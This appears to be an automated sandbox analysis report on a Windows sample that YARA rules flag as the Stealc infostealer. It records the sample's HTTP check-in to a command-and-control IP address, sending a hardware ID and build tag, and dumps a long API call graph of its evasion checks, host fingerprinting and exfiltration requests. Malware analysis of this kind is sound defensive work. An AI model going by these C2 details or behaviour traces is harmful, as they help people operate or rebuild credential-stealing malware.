                  • 185.215.113.37
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 6756 | C:\Users\user\Desktop\file.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Oct 4, 2024 04:41:06.257903099 CEST | 89 | OUT | GET / HTTP/1.1
                  Host: 185.215.113.37
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Oct 4, 2024 04:41:06.945116997 CEST | 203 | IN | HTTP/1.1 200 OK
                  Date: Fri, 04 Oct 2024 02:41:06 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 0
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Oct 4, 2024 04:41:06.948136091 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                  Content-Type: multipart/form-data; boundary=----BKKFHIEGDHJKECAAKKEB
                  Host: 185.215.113.37
                  Content-Length: 211
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 34 34 41 32 33 39 43 45 32 32 32 38 33 38 34 32 30 38 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 2d 2d 0d 0a
                  Data Ascii: ------BKKFHIEGDHJKECAAKKEBContent-Disposition: form-data; name="hwid"B944A239CE222838420810------BKKFHIEGDHJKECAAKKEBContent-Disposition: form-data; name="build"doma------BKKFHIEGDHJKECAAKKEB--
                  Oct 4, 2024 04:41:07.170490026 CEST | 210 | IN | HTTP/1.1 200 OK
                  Date: Fri, 04 Oct 2024 02:41:07 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 8
                  Keep-Alive: timeout=5, max=99
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 59 6d 78 76 59 32 73 3d
                  Data Ascii: YmxvY2s=



                  Target ID: 0
                  Start time: 22:41:02
                  Start date: 03/10/2024
                  Path: C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit): true
                  Commandline: "C:\Users\user\Desktop\file.exe"
                  Imagebase: 0x630000
                  File size: 1'846'272 bytes
                  MD5 hash: 93DB12453AC29AD390CBD66F4B6DFD52
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1746371608.0000000005000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  Reputation: low
                  Has exited: true


                    Execution Graph

                    Execution Coverage: 9.8%
                    Dynamic/Decrypted Code Coverage: 0%
                    Signature Coverage: 9.7%
                    Total number of Nodes: 2000
                    Total number of Limit Nodes: 24
                    execution_graph: interactive call-graph data (2000 nodes with their edges) not reproduced. The call chain recoverable from those edges, given as image-relative addresses with the Windows APIs each node reaches ("|" marks alternative branches):
                    6469f0 -> 632260 (repeated calls to 6345c0: RtlAllocateHeap, VirtualProtect) -> 649860 (649750 GetPEB; 649a93 LoadLibraryA x5; GetProcAddress) -> 646a00 -> 64a740 lstrcpy -> 6311d0
                    6311d0 -> 63120f ExitProcess | 631217 -> 631160 GetSystemInfo -> 63117c ExitProcess | 631184 -> 631110 GetCurrentProcess, VirtualAllocExNuma -> 631141 ExitProcess | 631149 -> 6310a0 VirtualAlloc, VirtualFree -> 631220 -> 6489b0 GlobalMemoryStatusEx -> 631249 -> 631292 ExitProcess | 63129a
                    63129a -> 646770 GetUserDefaultLangID -> 646792 -> ExitProcess (one of five branches: 6467a3, 6467ad, 6467b7, 6467c1, 6467cb) | 6467d3 -> 631190 -> 6478e0 (GetProcessHeap, RtlAllocateHeap, GetComputerNameA) / 647850 (GetProcessHeap, RtlAllocateHeap, GetUserNameA) -> 6311c4 ExitProcess | 646a30 -> 646a43 -> 64a9b0 (lstrlen, lstrcpy, lstrcat)
                    646a64 .. 646a80 (64a9b0 x4) -> 64a8a0 lstrcpy -> 646a89 -> 646ac2 OpenEventA -> 646af5 CloseHandle, Sleep -> 646b0a -> 646a89 | 646ae1 CreateEventA -> 646b0c -> 646920 GetSystemTime -> 646820 (lstrcpy chain) -> 646998 sscanf -> 6469aa SystemTimeToFileTime x2 -> 6469d8 ExitProcess | 645b10
                    645b10 -> 64a740 lstrcpy, 64a820 (lstrlen, lstrcpy) x4, 646430 (64a8a0 lstrcpy x4) -> 645bf9 -> 6326a0 (repeated calls to 6345c0) -> 649c10 (64a036 8 API calls; 649c20 43 API calls; GetProcAddress runs) -> 645ca3 -> 631590 -> 631670 lstrcpy -> 645510 -> 64557c hub: 6452c0 (25 API calls), 6451f0 (20 API calls), StrCmpCA at 645643, 6456a0, 64578a, 645856, 64593f, 645a0b; 645a16 Sleep; 6457dc, 645991, 645a28 -> 631670 lstrcpy -> 645811 -> 645cc3
                    645cc3 -> 646430 lstrcpy, alternating 64a9b0 / 64a8a0 lstrcpy -> 645d9e -> 647500 GetWindowsDirectoryA -> 634880 -> 6417a0 -> 631590 lstrcpy -> 635960 (34 API calls) -> 641050 -> 640d90 -> 640f40 -> 641a10 -> 634fb0 (GetProcessHeap, RtlAllocateHeap, InternetOpenA) -> 631590 -> 640740 -> 631590 -> 635960 (34 API calls) -> 645fa0
64a8a0 lstrcpy 14457->14458 14458->14457 14460 647553 GetVolumeInformationA 14459->14460 14461 64754c 14459->14461 14462 647591 14460->14462 14461->14460 14463 6475fc GetProcessHeap RtlAllocateHeap 14462->14463 14464 647628 wsprintfA 14463->14464 14465 647619 14463->14465 14467 64a740 lstrcpy 14464->14467 14466 64a740 lstrcpy 14465->14466 14468 645da7 14466->14468 14467->14468 14468->13532 14470 64a7a0 lstrcpy 14469->14470 14471 634899 14470->14471 15521 6347b0 14471->15521 14473 6348a5 14474 64a740 lstrcpy 14473->14474 14475 6348d7 14474->14475 14476 64a740 lstrcpy 14475->14476 14477 6348e4 14476->14477 14478 64a740 lstrcpy 14477->14478 14479 6348f1 14478->14479 14480 64a740 lstrcpy 14479->14480 14481 6348fe 14480->14481 14482 64a740 lstrcpy 14481->14482 14483 63490b InternetOpenA StrCmpCA 14482->14483 14484 634944 14483->14484 14485 634ecb InternetCloseHandle 14484->14485 15527 648b60 14484->15527 14487 634ee8 14485->14487 15542 639ac0 CryptStringToBinaryA 14487->15542 14488 634963 15535 64a920 14488->15535 14491 634976 14493 64a8a0 lstrcpy 14491->14493 14498 63497f 14493->14498 14494 64a820 2 API calls 14495 634f05 14494->14495 14497 64a9b0 4 API calls 14495->14497 14496 634f27 ctype 14500 64a7a0 lstrcpy 14496->14500 14499 634f1b 14497->14499 14502 64a9b0 4 API calls 14498->14502 14501 64a8a0 lstrcpy 14499->14501 14513 634f57 14500->14513 14501->14496 14503 6349a9 14502->14503 14504 64a8a0 lstrcpy 14503->14504 14505 6349b2 14504->14505 14506 64a9b0 4 API calls 14505->14506 14507 6349d1 14506->14507 14508 64a8a0 lstrcpy 14507->14508 14509 6349da 14508->14509 14510 64a920 3 API calls 14509->14510 14511 6349f8 14510->14511 14512 64a8a0 lstrcpy 14511->14512 14514 634a01 14512->14514 14513->13535 14515 64a9b0 4 API calls 14514->14515 14516 634a20 14515->14516 14517 64a8a0 lstrcpy 14516->14517 14518 634a29 14517->14518 14519 64a9b0 4 API calls 14518->14519 14520 634a48 14519->14520 14521 64a8a0 lstrcpy 14520->14521 14522 634a51 14521->14522 14523 64a9b0 4 API calls 
14522->14523 14524 634a7d 14523->14524 14525 64a920 3 API calls 14524->14525 14526 634a84 14525->14526 14527 64a8a0 lstrcpy 14526->14527 14528 634a8d 14527->14528 14529 634aa3 InternetConnectA 14528->14529 14529->14485 14530 634ad3 HttpOpenRequestA 14529->14530 14532 634b28 14530->14532 14533 634ebe InternetCloseHandle 14530->14533 14534 64a9b0 4 API calls 14532->14534 14533->14485 14535 634b3c 14534->14535 14536 64a8a0 lstrcpy 14535->14536 14537 634b45 14536->14537 14538 64a920 3 API calls 14537->14538 14539 634b63 14538->14539 14540 64a8a0 lstrcpy 14539->14540 14541 634b6c 14540->14541 14542 64a9b0 4 API calls 14541->14542 14543 634b8b 14542->14543 14544 64a8a0 lstrcpy 14543->14544 14545 634b94 14544->14545 14546 64a9b0 4 API calls 14545->14546 14547 634bb5 14546->14547 14548 64a8a0 lstrcpy 14547->14548 14549 634bbe 14548->14549 14550 64a9b0 4 API calls 14549->14550 14551 634bde 14550->14551 14552 64a8a0 lstrcpy 14551->14552 14553 634be7 14552->14553 14554 64a9b0 4 API calls 14553->14554 14555 634c06 14554->14555 14556 64a8a0 lstrcpy 14555->14556 14557 634c0f 14556->14557 14558 64a920 3 API calls 14557->14558 14559 634c2d 14558->14559 14560 64a8a0 lstrcpy 14559->14560 14561 634c36 14560->14561 14562 64a9b0 4 API calls 14561->14562 14563 634c55 14562->14563 14564 64a8a0 lstrcpy 14563->14564 14565 634c5e 14564->14565 14566 64a9b0 4 API calls 14565->14566 14567 634c7d 14566->14567 14568 64a8a0 lstrcpy 14567->14568 14569 634c86 14568->14569 14570 64a920 3 API calls 14569->14570 14571 634ca4 14570->14571 14572 64a8a0 lstrcpy 14571->14572 14573 634cad 14572->14573 14574 64a9b0 4 API calls 14573->14574 14575 634ccc 14574->14575 14576 64a8a0 lstrcpy 14575->14576 14577 634cd5 14576->14577 14578 64a9b0 4 API calls 14577->14578 14579 634cf6 14578->14579 14580 64a8a0 lstrcpy 14579->14580 14581 634cff 14580->14581 14582 64a9b0 4 API calls 14581->14582 14583 634d1f 14582->14583 14584 64a8a0 lstrcpy 14583->14584 14585 634d28 14584->14585 14586 64a9b0 4 API calls 14585->14586 
14587 634d47 14586->14587 14588 64a8a0 lstrcpy 14587->14588 14589 634d50 14588->14589 14590 64a920 3 API calls 14589->14590 14591 634d6e 14590->14591 14592 64a8a0 lstrcpy 14591->14592 14593 634d77 14592->14593 14594 64a740 lstrcpy 14593->14594 14595 634d92 14594->14595 14596 64a920 3 API calls 14595->14596 14597 634db3 14596->14597 14598 64a920 3 API calls 14597->14598 14599 634dba 14598->14599 14600 64a8a0 lstrcpy 14599->14600 14601 634dc6 14600->14601 14602 634de7 lstrlen 14601->14602 14603 634dfa 14602->14603 14604 634e03 lstrlen 14603->14604 15541 64aad0 14604->15541 14606 634e13 HttpSendRequestA 14607 634e32 InternetReadFile 14606->14607 14608 634e67 InternetCloseHandle 14607->14608 14613 634e5e 14607->14613 14610 64a800 14608->14610 14610->14533 14611 64a9b0 4 API calls 14611->14613 14612 64a8a0 lstrcpy 14612->14613 14613->14607 14613->14608 14613->14611 14613->14612 15548 64aad0 14614->15548 14616 6417c4 StrCmpCA 14617 6417d7 14616->14617 14618 6417cf ExitProcess 14616->14618 14619 6419c2 14617->14619 14620 6418ad StrCmpCA 14617->14620 14621 6418cf StrCmpCA 14617->14621 14622 641970 StrCmpCA 14617->14622 14623 6418f1 StrCmpCA 14617->14623 14624 641951 StrCmpCA 14617->14624 14625 641932 StrCmpCA 14617->14625 14626 641913 StrCmpCA 14617->14626 14627 64185d StrCmpCA 14617->14627 14628 64187f StrCmpCA 14617->14628 14629 64a820 lstrlen lstrcpy 14617->14629 14619->13537 14620->14617 14621->14617 14622->14617 14623->14617 14624->14617 14625->14617 14626->14617 14627->14617 14628->14617 14629->14617 14631 64a7a0 lstrcpy 14630->14631 14632 635979 14631->14632 14633 6347b0 2 API calls 14632->14633 14634 635985 14633->14634 14635 64a740 lstrcpy 14634->14635 14636 6359ba 14635->14636 14637 64a740 lstrcpy 14636->14637 14638 6359c7 14637->14638 14639 64a740 lstrcpy 14638->14639 14640 6359d4 14639->14640 14641 64a740 lstrcpy 14640->14641 14642 6359e1 14641->14642 14643 64a740 lstrcpy 14642->14643 14644 6359ee InternetOpenA StrCmpCA 14643->14644 14645 635a1d 14644->14645 
14646 635fc3 InternetCloseHandle 14645->14646 14648 648b60 3 API calls 14645->14648 14647 635fe0 14646->14647 14650 639ac0 4 API calls 14647->14650 14649 635a3c 14648->14649 14651 64a920 3 API calls 14649->14651 14652 635fe6 14650->14652 14653 635a4f 14651->14653 14655 64a820 2 API calls 14652->14655 14658 63601f ctype 14652->14658 14654 64a8a0 lstrcpy 14653->14654 14659 635a58 14654->14659 14656 635ffd 14655->14656 14657 64a9b0 4 API calls 14656->14657 14660 636013 14657->14660 14661 64a7a0 lstrcpy 14658->14661 14663 64a9b0 4 API calls 14659->14663 14662 64a8a0 lstrcpy 14660->14662 14672 63604f 14661->14672 14662->14658 14664 635a82 14663->14664 14665 64a8a0 lstrcpy 14664->14665 14666 635a8b 14665->14666 14667 64a9b0 4 API calls 14666->14667 14668 635aaa 14667->14668 14669 64a8a0 lstrcpy 14668->14669 14670 635ab3 14669->14670 14671 64a920 3 API calls 14670->14671 14673 635ad1 14671->14673 14672->13543 14674 64a8a0 lstrcpy 14673->14674 14675 635ada 14674->14675 14676 64a9b0 4 API calls 14675->14676 14677 635af9 14676->14677 14678 64a8a0 lstrcpy 14677->14678 14679 635b02 14678->14679 14680 64a9b0 4 API calls 14679->14680 14681 635b21 14680->14681 14682 64a8a0 lstrcpy 14681->14682 14683 635b2a 14682->14683 14684 64a9b0 4 API calls 14683->14684 14685 635b56 14684->14685 14686 64a920 3 API calls 14685->14686 14687 635b5d 14686->14687 14688 64a8a0 lstrcpy 14687->14688 14689 635b66 14688->14689 14690 635b7c InternetConnectA 14689->14690 14690->14646 14691 635bac HttpOpenRequestA 14690->14691 14693 635fb6 InternetCloseHandle 14691->14693 14694 635c0b 14691->14694 14693->14646 14695 64a9b0 4 API calls 14694->14695 14696 635c1f 14695->14696 14697 64a8a0 lstrcpy 14696->14697 14698 635c28 14697->14698 14699 64a920 3 API calls 14698->14699 14700 635c46 14699->14700 14701 64a8a0 lstrcpy 14700->14701 14702 635c4f 14701->14702 14703 64a9b0 4 API calls 14702->14703 14704 635c6e 14703->14704 14705 64a8a0 lstrcpy 14704->14705 14706 635c77 14705->14706 14707 64a9b0 4 API calls 
14706->14707 14708 635c98 14707->14708 14709 64a8a0 lstrcpy 14708->14709 14710 635ca1 14709->14710 14711 64a9b0 4 API calls 14710->14711 14712 635cc1 14711->14712 14713 64a8a0 lstrcpy 14712->14713 14714 635cca 14713->14714 14715 64a9b0 4 API calls 14714->14715 14716 635ce9 14715->14716 14717 64a8a0 lstrcpy 14716->14717 14718 635cf2 14717->14718 14719 64a920 3 API calls 14718->14719 14720 635d10 14719->14720 14721 64a8a0 lstrcpy 14720->14721 14722 635d19 14721->14722 14723 64a9b0 4 API calls 14722->14723 14724 635d38 14723->14724 14725 64a8a0 lstrcpy 14724->14725 14726 635d41 14725->14726 14727 64a9b0 4 API calls 14726->14727 14728 635d60 14727->14728 14729 64a8a0 lstrcpy 14728->14729 14730 635d69 14729->14730 14731 64a920 3 API calls 14730->14731 14732 635d87 14731->14732 14733 64a8a0 lstrcpy 14732->14733 14734 635d90 14733->14734 14735 64a9b0 4 API calls 14734->14735 14736 635daf 14735->14736 14737 64a8a0 lstrcpy 14736->14737 14738 635db8 14737->14738 14739 64a9b0 4 API calls 14738->14739 14740 635dd9 14739->14740 14741 64a8a0 lstrcpy 14740->14741 14742 635de2 14741->14742 14743 64a9b0 4 API calls 14742->14743 14744 635e02 14743->14744 14745 64a8a0 lstrcpy 14744->14745 14746 635e0b 14745->14746 14747 64a9b0 4 API calls 14746->14747 14748 635e2a 14747->14748 14749 64a8a0 lstrcpy 14748->14749 14750 635e33 14749->14750 14751 64a920 3 API calls 14750->14751 14752 635e54 14751->14752 14753 64a8a0 lstrcpy 14752->14753 14754 635e5d 14753->14754 14755 635e70 lstrlen 14754->14755 15549 64aad0 14755->15549 14757 635e81 lstrlen GetProcessHeap RtlAllocateHeap 15550 64aad0 14757->15550 14759 635eae lstrlen 14760 635ebe 14759->14760 14761 635ed7 lstrlen 14760->14761 14762 635ee7 14761->14762 14763 635ef0 lstrlen 14762->14763 14764 635f04 14763->14764 14765 635f1a lstrlen 14764->14765 15551 64aad0 14765->15551 14767 635f2a HttpSendRequestA 14768 635f35 InternetReadFile 14767->14768 14769 635f6a InternetCloseHandle 14768->14769 14773 635f61 14768->14773 14769->14693 14771 64a9b0 
4 API calls 14771->14773 14772 64a8a0 lstrcpy 14772->14773 14773->14768 14773->14769 14773->14771 14773->14772 14776 641077 14774->14776 14775 641151 14775->13545 14776->14775 14777 64a820 lstrlen lstrcpy 14776->14777 14777->14776 14783 640db7 14778->14783 14779 640f17 14779->13553 14780 640ea4 StrCmpCA 14780->14783 14781 640e27 StrCmpCA 14781->14783 14782 640e67 StrCmpCA 14782->14783 14783->14779 14783->14780 14783->14781 14783->14782 14784 64a820 lstrlen lstrcpy 14783->14784 14784->14783 14789 640f67 14785->14789 14786 641044 14786->13561 14787 640fb2 StrCmpCA 14787->14789 14788 64a820 lstrlen lstrcpy 14788->14789 14789->14786 14789->14787 14789->14788 14791 64a740 lstrcpy 14790->14791 14792 641a26 14791->14792 14793 64a9b0 4 API calls 14792->14793 14794 641a37 14793->14794 14795 64a8a0 lstrcpy 14794->14795 14796 641a40 14795->14796 14797 64a9b0 4 API calls 14796->14797 14798 641a5b 14797->14798 14799 64a8a0 lstrcpy 14798->14799 14800 641a64 14799->14800 14801 64a9b0 4 API calls 14800->14801 14802 641a7d 14801->14802 14803 64a8a0 lstrcpy 14802->14803 14804 641a86 14803->14804 14805 64a9b0 4 API calls 14804->14805 14806 641aa1 14805->14806 14807 64a8a0 lstrcpy 14806->14807 14808 641aaa 14807->14808 14809 64a9b0 4 API calls 14808->14809 14810 641ac3 14809->14810 14811 64a8a0 lstrcpy 14810->14811 14812 641acc 14811->14812 14813 64a9b0 4 API calls 14812->14813 14814 641ae7 14813->14814 14815 64a8a0 lstrcpy 14814->14815 14816 641af0 14815->14816 14817 64a9b0 4 API calls 14816->14817 14818 641b09 14817->14818 14819 64a8a0 lstrcpy 14818->14819 14820 641b12 14819->14820 14821 64a9b0 4 API calls 14820->14821 14822 641b2d 14821->14822 14823 64a8a0 lstrcpy 14822->14823 14824 641b36 14823->14824 14825 64a9b0 4 API calls 14824->14825 14826 641b4f 14825->14826 14827 64a8a0 lstrcpy 14826->14827 14828 641b58 14827->14828 14829 64a9b0 4 API calls 14828->14829 14830 641b76 14829->14830 14831 64a8a0 lstrcpy 14830->14831 14832 641b7f 14831->14832 14833 647500 6 API calls 
14832->14833 14834 641b96 14833->14834 14835 64a920 3 API calls 14834->14835 14836 641ba9 14835->14836 14837 64a8a0 lstrcpy 14836->14837 14838 641bb2 14837->14838 14839 64a9b0 4 API calls 14838->14839 14840 641bdc 14839->14840 14841 64a8a0 lstrcpy 14840->14841 14842 641be5 14841->14842 14843 64a9b0 4 API calls 14842->14843 14844 641c05 14843->14844 14845 64a8a0 lstrcpy 14844->14845 14846 641c0e 14845->14846 15552 647690 GetProcessHeap RtlAllocateHeap 14846->15552 14849 64a9b0 4 API calls 14850 641c2e 14849->14850 14851 64a8a0 lstrcpy 14850->14851 14852 641c37 14851->14852 14853 64a9b0 4 API calls 14852->14853 14854 641c56 14853->14854 14855 64a8a0 lstrcpy 14854->14855 14856 641c5f 14855->14856 14857 64a9b0 4 API calls 14856->14857 14858 641c80 14857->14858 14859 64a8a0 lstrcpy 14858->14859 14860 641c89 14859->14860 15559 6477c0 GetCurrentProcess IsWow64Process 14860->15559 14863 64a9b0 4 API calls 14864 641ca9 14863->14864 14865 64a8a0 lstrcpy 14864->14865 14866 641cb2 14865->14866 14867 64a9b0 4 API calls 14866->14867 14868 641cd1 14867->14868 14869 64a8a0 lstrcpy 14868->14869 14870 641cda 14869->14870 14871 64a9b0 4 API calls 14870->14871 14872 641cfb 14871->14872 14873 64a8a0 lstrcpy 14872->14873 14874 641d04 14873->14874 14875 647850 3 API calls 14874->14875 14876 641d14 14875->14876 14877 64a9b0 4 API calls 14876->14877 14878 641d24 14877->14878 14879 64a8a0 lstrcpy 14878->14879 14880 641d2d 14879->14880 14881 64a9b0 4 API calls 14880->14881 14882 641d4c 14881->14882 14883 64a8a0 lstrcpy 14882->14883 14884 641d55 14883->14884 14885 64a9b0 4 API calls 14884->14885 14886 641d75 14885->14886 14887 64a8a0 lstrcpy 14886->14887 14888 641d7e 14887->14888 14889 6478e0 3 API calls 14888->14889 14890 641d8e 14889->14890 14891 64a9b0 4 API calls 14890->14891 14892 641d9e 14891->14892 14893 64a8a0 lstrcpy 14892->14893 14894 641da7 14893->14894 14895 64a9b0 4 API calls 14894->14895 14896 641dc6 14895->14896 14897 64a8a0 lstrcpy 14896->14897 14898 641dcf 14897->14898 14899 
64a9b0 4 API calls 14898->14899 14900 641df0 14899->14900 14901 64a8a0 lstrcpy 14900->14901 14902 641df9 14901->14902 15561 647980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14902->15561 14905 64a9b0 4 API calls 14906 641e19 14905->14906 14907 64a8a0 lstrcpy 14906->14907 14908 641e22 14907->14908 14909 64a9b0 4 API calls 14908->14909 14910 641e41 14909->14910 14911 64a8a0 lstrcpy 14910->14911 14912 641e4a 14911->14912 14913 64a9b0 4 API calls 14912->14913 14914 641e6b 14913->14914 14915 64a8a0 lstrcpy 14914->14915 14916 641e74 14915->14916 15563 647a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14916->15563 14919 64a9b0 4 API calls 14920 641e94 14919->14920 14921 64a8a0 lstrcpy 14920->14921 14922 641e9d 14921->14922 14923 64a9b0 4 API calls 14922->14923 14924 641ebc 14923->14924 14925 64a8a0 lstrcpy 14924->14925 14926 641ec5 14925->14926 14927 64a9b0 4 API calls 14926->14927 14928 641ee5 14927->14928 14929 64a8a0 lstrcpy 14928->14929 14930 641eee 14929->14930 15566 647b00 GetUserDefaultLocaleName 14930->15566 14933 64a9b0 4 API calls 14934 641f0e 14933->14934 14935 64a8a0 lstrcpy 14934->14935 14936 641f17 14935->14936 14937 64a9b0 4 API calls 14936->14937 14938 641f36 14937->14938 14939 64a8a0 lstrcpy 14938->14939 14940 641f3f 14939->14940 14941 64a9b0 4 API calls 14940->14941 14942 641f60 14941->14942 14943 64a8a0 lstrcpy 14942->14943 14944 641f69 14943->14944 15570 647b90 14944->15570 14946 641f80 14947 64a920 3 API calls 14946->14947 14948 641f93 14947->14948 14949 64a8a0 lstrcpy 14948->14949 14950 641f9c 14949->14950 14951 64a9b0 4 API calls 14950->14951 14952 641fc6 14951->14952 14953 64a8a0 lstrcpy 14952->14953 14954 641fcf 14953->14954 14955 64a9b0 4 API calls 14954->14955 14956 641fef 14955->14956 14957 64a8a0 lstrcpy 14956->14957 14958 641ff8 14957->14958 15582 647d80 GetSystemPowerStatus 14958->15582 14961 64a9b0 4 API calls 14962 642018 14961->14962 14963 64a8a0 lstrcpy 14962->14963 14964 642021 14963->14964 14965 64a9b0 4 API calls 
14964->14965 14966 642040 14965->14966 14967 64a8a0 lstrcpy 14966->14967 14968 642049 14967->14968 14969 64a9b0 4 API calls 14968->14969 14970 64206a 14969->14970 14971 64a8a0 lstrcpy 14970->14971 14972 642073 14971->14972 14973 64207e GetCurrentProcessId 14972->14973 15584 649470 OpenProcess 14973->15584 14976 64a920 3 API calls 14977 6420a4 14976->14977 14978 64a8a0 lstrcpy 14977->14978 14979 6420ad 14978->14979 14980 64a9b0 4 API calls 14979->14980 14981 6420d7 14980->14981 14982 64a8a0 lstrcpy 14981->14982 14983 6420e0 14982->14983 14984 64a9b0 4 API calls 14983->14984 14985 642100 14984->14985 14986 64a8a0 lstrcpy 14985->14986 14987 642109 14986->14987 15589 647e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14987->15589 14990 64a9b0 4 API calls 14991 642129 14990->14991 14992 64a8a0 lstrcpy 14991->14992 14993 642132 14992->14993 14994 64a9b0 4 API calls 14993->14994 14995 642151 14994->14995 14996 64a8a0 lstrcpy 14995->14996 14997 64215a 14996->14997 14998 64a9b0 4 API calls 14997->14998 14999 64217b 14998->14999 15000 64a8a0 lstrcpy 14999->15000 15001 642184 15000->15001 15593 647f60 15001->15593 15004 64a9b0 4 API calls 15005 6421a4 15004->15005 15006 64a8a0 lstrcpy 15005->15006 15007 6421ad 15006->15007 15008 64a9b0 4 API calls 15007->15008 15009 6421cc 15008->15009 15010 64a8a0 lstrcpy 15009->15010 15011 6421d5 15010->15011 15012 64a9b0 4 API calls 15011->15012 15013 6421f6 15012->15013 15014 64a8a0 lstrcpy 15013->15014 15015 6421ff 15014->15015 15606 647ed0 GetSystemInfo wsprintfA 15015->15606 15018 64a9b0 4 API calls 15019 64221f 15018->15019 15020 64a8a0 lstrcpy 15019->15020 15021 642228 15020->15021 15022 64a9b0 4 API calls 15021->15022 15023 642247 15022->15023 15024 64a8a0 lstrcpy 15023->15024 15025 642250 15024->15025 15026 64a9b0 4 API calls 15025->15026 15027 642270 15026->15027 15028 64a8a0 lstrcpy 15027->15028 15029 642279 15028->15029 15608 648100 GetProcessHeap RtlAllocateHeap 15029->15608 15032 64a9b0 4 API calls 15033 642299 15032->15033 
15034 64a8a0 lstrcpy 15033->15034 15035 6422a2 15034->15035 15036 64a9b0 4 API calls 15035->15036 15037 6422c1 15036->15037 15038 64a8a0 lstrcpy 15037->15038 15039 6422ca 15038->15039 15040 64a9b0 4 API calls 15039->15040 15041 6422eb 15040->15041 15042 64a8a0 lstrcpy 15041->15042 15043 6422f4 15042->15043 15614 6487c0 15043->15614 15046 64a920 3 API calls 15047 64231e 15046->15047 15048 64a8a0 lstrcpy 15047->15048 15049 642327 15048->15049 15050 64a9b0 4 API calls 15049->15050 15051 642351 15050->15051 15052 64a8a0 lstrcpy 15051->15052 15053 64235a 15052->15053 15054 64a9b0 4 API calls 15053->15054 15055 64237a 15054->15055 15056 64a8a0 lstrcpy 15055->15056 15057 642383 15056->15057 15058 64a9b0 4 API calls 15057->15058 15059 6423a2 15058->15059 15060 64a8a0 lstrcpy 15059->15060 15061 6423ab 15060->15061 15619 6481f0 15061->15619 15063 6423c2 15064 64a920 3 API calls 15063->15064 15065 6423d5 15064->15065 15066 64a8a0 lstrcpy 15065->15066 15067 6423de 15066->15067 15068 64a9b0 4 API calls 15067->15068 15069 64240a 15068->15069 15070 64a8a0 lstrcpy 15069->15070 15071 642413 15070->15071 15072 64a9b0 4 API calls 15071->15072 15073 642432 15072->15073 15074 64a8a0 lstrcpy 15073->15074 15075 64243b 15074->15075 15076 64a9b0 4 API calls 15075->15076 15077 64245c 15076->15077 15078 64a8a0 lstrcpy 15077->15078 15079 642465 15078->15079 15080 64a9b0 4 API calls 15079->15080 15081 642484 15080->15081 15082 64a8a0 lstrcpy 15081->15082 15083 64248d 15082->15083 15084 64a9b0 4 API calls 15083->15084 15085 6424ae 15084->15085 15086 64a8a0 lstrcpy 15085->15086 15087 6424b7 15086->15087 15627 648320 15087->15627 15089 6424d3 15090 64a920 3 API calls 15089->15090 15091 6424e6 15090->15091 15092 64a8a0 lstrcpy 15091->15092 15093 6424ef 15092->15093 15094 64a9b0 4 API calls 15093->15094 15095 642519 15094->15095 15096 64a8a0 lstrcpy 15095->15096 15097 642522 15096->15097 15098 64a9b0 4 API calls 15097->15098 15099 642543 15098->15099 15100 64a8a0 lstrcpy 15099->15100 15101 64254c 
15100->15101 15102 648320 17 API calls 15101->15102 15103 642568 15102->15103 15104 64a920 3 API calls 15103->15104 15105 64257b 15104->15105 15106 64a8a0 lstrcpy 15105->15106 15107 642584 15106->15107 15108 64a9b0 4 API calls 15107->15108 15109 6425ae 15108->15109 15110 64a8a0 lstrcpy 15109->15110 15111 6425b7 15110->15111 15112 64a9b0 4 API calls 15111->15112 15113 6425d6 15112->15113 15114 64a8a0 lstrcpy 15113->15114 15115 6425df 15114->15115 15116 64a9b0 4 API calls 15115->15116 15117 642600 15116->15117 15118 64a8a0 lstrcpy 15117->15118 15119 642609 15118->15119 15663 648680 15119->15663 15121 642620 15122 64a920 3 API calls 15121->15122 15123 642633 15122->15123 15124 64a8a0 lstrcpy 15123->15124 15125 64263c 15124->15125 15126 64265a lstrlen 15125->15126 15127 64266a 15126->15127 15128 64a740 lstrcpy 15127->15128 15129 64267c 15128->15129 15130 631590 lstrcpy 15129->15130 15131 64268d 15130->15131 15673 645190 15131->15673 15133 642699 15133->13565 15861 64aad0 15134->15861 15136 635009 InternetOpenUrlA 15139 635021 15136->15139 15137 6350a0 InternetCloseHandle InternetCloseHandle 15140 6350ec 15137->15140 15138 63502a InternetReadFile 15138->15139 15139->15137 15139->15138 15140->13569 15862 6398d0 15141->15862 15143 640759 15144 64077d 15143->15144 15145 640a38 15143->15145 15147 640799 